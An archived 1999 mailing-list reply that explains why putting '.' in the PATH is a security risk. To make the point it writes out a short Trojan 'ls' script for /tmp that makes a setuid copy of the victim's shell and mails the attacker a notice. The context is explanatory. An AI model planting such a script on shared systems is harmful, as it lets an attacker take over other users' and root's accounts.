From: wood AT kingsley DOT co DOT za (Michael Wood) Subject: "." in $PATH 12 Jan 1999 06:47:40 -0800 Message-ID: <05e201be3df1$53e01680$fe181eac.cygnus.gnu-win32@wodin.bsw.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit To: "Will Mooar" , Hi -----Original Message----- From: Will Mooar To: SWarsMatt AT aol DOT com ; gnu-win32 AT cygnus DOT com Date: Monday, January 11, 1999 5:12 PM Subject: Re: Problem with /bin mount? >This is normal for unix (and cygwin) - it only searches for applications to >run from the PATH environment variable. If "." is not in the PATH, it won't >find configure in the current directory. > >I have seen people mention that this is generally a bad idea, as it may pose >a security threat. Unfortunately, no-one has elaborated why. I can't see >why it would be a problem for windows, except that it might accidentally run >the wrong thing if two or more programs exist with the same name, but >function differently. This is exactly what the security risk is. If the default path on a machine looks like this: .:/bin:/usr/bin:/usr/local/bin and I put the following script in /tmp: #!/bin/sh cp /bin/sh /tmp/.sh.$$ chown $UID /tmp/.sh.$$ chmod 4755 /tmp/.sh.$$ echo "$$" | mail -s "Got one" me ls $* and call it "ls", I could collect shells for other peoples' accounts by waiting for them to cd to /tmp and type "ls". If "." is last in the path, I would have to name the script something like "sl" and wait for a typo. If the person with . in their path is root, the problem is much worse. The script could also try to delete files instead of creating a SUID shell or do something else as the user executing it. -- Michael Wood | Kingsley Technologies wood AT kingsley DOT co DOT za | Tel: +27 21 762 0276 - For help on using this list (especially unsubscribing), send a message to "gnu-win32-request AT cygnus DOT com" with one line of text: "help".